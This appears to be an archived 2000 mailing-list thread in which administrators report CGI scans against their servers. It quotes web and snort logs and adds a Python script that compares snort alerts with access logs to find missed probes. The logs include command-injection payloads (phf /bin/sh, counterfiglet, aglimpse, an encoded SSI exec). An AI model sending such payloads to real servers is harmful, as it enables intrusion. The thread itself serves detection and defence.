Security Incidents mailing list archives
Re: Scans from udel.edu and tue.nl
From: fernando () BN PT (Fernando Cardoso)
Date: Thu, 23 Mar 2000 09:26:27 -0000
I've seen the same here. Here's what snort gets from the probes.

Mar 20 02:55:05 snort: WEB-CGI-TEST-CGIprobe!: 128.175.13.74:48153 -> x.x.x.x:80
Mar 20 05:15:55 snort: WEB-CGI-PHF CGI access attempt: 128.175.13.74:59064 -> x.x.x.x:80
Mar 20 06:11:25 snort: WEB-CGI-Aglimpse CGI access attempt: 128.175.13.74:58311 -> x.x.x.x:80
Mar 21 05:41:16 snort: WEB-CGI-sh: 128.175.13.74:57899 -> x.x.x.x:80
Mar 21 06:25:26 snort: WEB-CGI-query: 128.175.13.74:34372 -> x.x.x.x:80

I've compared this with the web server logs and my snort rulebase only missed a couple of probes (counterfiglet and perl).

______________________________________________
Fernando Cardoso
Network Administrator
National Library of Portugal
-----Original Message-----
From: Gregor Sfiligoj [mailto:gregor () TMEDIA IT]
Sent: Wednesday, 22 March 2000 12:39
To: INCIDENTS () SECURITYFOCUS COM
Subject: R: Scans from udel.edu and tue.nl

I have noted the same from strauss.udel.edu.

128.175.13.74 - - [19/Mar/2000:17:53:24 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301
128.175.13.74 - - [20/Mar/2000:03:58:47 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 500 522
128.175.13.74 - - [20/Mar/2000:06:17:50 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205
128.175.13.74 - - [20/Mar/2000:07:12:58 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 271
128.175.13.74 - - [21/Mar/2000:01:00:05 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 206
128.175.13.74 - - [21/Mar/2000:06:42:23 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 204
128.175.13.74 - - [21/Mar/2000:07:26:45 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207

Are all of these covered by the arachNIDS library for snort?

gregor sfiligoj
gregor () tmedia it

-----Original Message-----
From: Incidents Mailing List [mailto:INCIDENTS () SECURITYFOCUS COM] On behalf of Jose Nazario
Sent: Tuesday, 21 March 2000 17:59
To: INCIDENTS () SECURITYFOCUS COM
Subject: Scans from udel.edu and tue.nl

Hi,

[Local hostnames have been munged, outside addresses are real]

I wanted to write a quick note to you guys about two sets of web scans we have seen on the CWRU campus these past few days.

The first is from the University of Delaware, with some classic cgi-bin attempts:

strauss.udel.edu - - [19/Mar/2000:11:41:23 -0500] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301
strauss.udel.edu - - [19/Mar/2000:21:44:53 -0500] "POST /cgi-bin/test-cgi HTTP/1.0" 404 210
strauss.udel.edu - - [20/Mar/2000:18:47:53 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206
strauss.udel.edu - - [21/Mar/2000:00:31:37 -0500] "POST /cgi-bin/sh HTTP/1.0" 404 204
strauss.udel.edu - - [21/Mar/2000:01:16:06 -0500] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207

The second set is from the Netherlands, who just got back to me this morning regarding two compromised accounts. They also tried some cgi-bin scans to gain access to the machine, as well as some rexec attempts and what appears to be a trojan horse access attempt:

webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206
webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205

Mar 19 04:23:04 server kernel: TCP connection rejected from 131.155.69.100, port 5556
Mar 19 05:48:22 server kernel: TCP connection rejected from 131.155.69.100, port 512
Mar 19 08:28:46 server kernel: TCP connection rejected from 131.155.69.100, port 512

And on another machine:

Mar 18 23:51:35 4C:workstation rexecd[14591]: refused connect from svstud.win.tue.nl
Mar 19 01:03:14 4C:workstation rexecd[14635]: refused connect from svstud.win.tue.nl
Mar 19 01:49:15 4C:workstation rexecd[14655]: refused connect from svstud.win.tue.nl
Mar 19 04:28:21 4C:workstation rexecd[14731]: refused connect from svstud.win.tue.nl
Mar 19 05:36:30 4C:workstation rexecd[14774]: refused connect from svstud.win.tue.nl
Mar 19 05:39:34 4C:workstation rexecd[14775]: refused connect from svstud.win.tue.nl
Mar 19 08:20:00 4C:workstation rexecd[14857]: refused connect from svstud.win.tue.nl
Mar 19 09:23:25 4C:workstation rexecd[14897]: refused connect from svstud.win.tue.nl

Both were campus wide probes for web access via cgi-bin and rexecd access (port 512/TCP). It's likely that other readers have seen these problems as well.

jose nazario
jose () biochemistry cwru edu
PGP fingerprint: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc
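The comparison Fernando describes, snort alerts against the web server log, as an added example that is not part of the thread: it correlates the two per source address to list the cgi-bin probes the rulebase never fired on, and %-decodes the query probe's argument, which a signature keyed on the script name alone never inspects. The alert names are the ones quoted in the thread; the sample log lines, the 192.0.2.10 source, the 10.0.0.5 target and the alert-to-script mapping are constructed.

```python
import re
from urllib.parse import unquote

# Constructed snort alerts, alert names as quoted in the thread; 192.0.2.10 is a documentation address.
SNORT_ALERTS = """\
Mar 20 02:55:05 snort: WEB-CGI-TEST-CGIprobe!: 192.0.2.10:48153 -> 10.0.0.5:80
Mar 20 05:15:55 snort: WEB-CGI-PHF CGI access attempt: 192.0.2.10:59064 -> 10.0.0.5:80
Mar 21 06:25:26 snort: WEB-CGI-query: 192.0.2.10:34372 -> 10.0.0.5:80
""".splitlines()
# Constructed common-log-format requests from the same source (payloads shortened).
ACCESS_LOG = """\
192.0.2.10 - - [19/Mar/2000:17:53:24 +0100] "GET /cgi-bin/counterfiglet/nc/f= HTTP/1.0" 404 301
192.0.2.10 - - [20/Mar/2000:03:58:47 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 500 522
192.0.2.10 - - [20/Mar/2000:06:17:50 +0100] "POST /cgi-bin/phf?Qname=x HTTP/1.0" 404 205
192.0.2.10 - - [21/Mar/2000:01:00:05 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 206
192.0.2.10 - - [21/Mar/2000:07:26:45 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207
""".splitlines()
# cgi-bin script each alert name refers to (mapping constructed from the alert names above)
ALERT_TO_SCRIPT = {"WEB-CGI-TEST-CGIprobe!": "test-cgi", "WEB-CGI-PHF CGI access attempt": "phf",
                   "WEB-CGI-query": "query"}
ALERT_RE = re.compile(r"snort: (?P<name>.+?): (?P<src>[\d.]+):\d+ -> ")
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3}')
SCRIPT_RE = re.compile(r"^/cgi-bin/(?P<script>[^/?|;]+)")

def alerted_scripts(alert_lines):
    """{src_ip: set of cgi-bin script names} the IDS fired on."""
    seen = {}
    for m in filter(None, map(ALERT_RE.search, alert_lines)):
        if m["name"] in ALERT_TO_SCRIPT:
            seen.setdefault(m["src"], set()).add(ALERT_TO_SCRIPT[m["name"]])
    return seen

def probed_scripts(log_lines):
    """{src_ip: set of cgi-bin script names} requested; paths are %-decoded so an encoded name still matches."""
    seen = {}
    for m in filter(None, map(LOG_RE.match, log_lines)):
        s = SCRIPT_RE.match(unquote(m["path"]))
        if s:
            seen.setdefault(m["src"], set()).add(s["script"])
    return seen

def missed_probes(alert_lines, log_lines):
    """Per source, scripts requested in the web log that raised no IDS alert."""
    alerted = alerted_scripts(alert_lines)
    return {src: sorted(s - alerted.get(src, set())) for src, s in probed_scripts(log_lines).items()}

def ssi_exec_requests(log_lines):
    """Script paths whose %-decoded query carries an SSI exec directive, invisible to a name-only signature."""
    return [m["path"].split("?")[0] for m in filter(None, map(LOG_RE.match, log_lines))
            if "<!--#exec" in unquote(m["path"]).lower()]
```

On the constructed data `missed_probes` reports counterfiglet and perl for 192.0.2.10, the same two gaps Fernando found, and `ssi_exec_requests` singles out `/cgi-bin/query`.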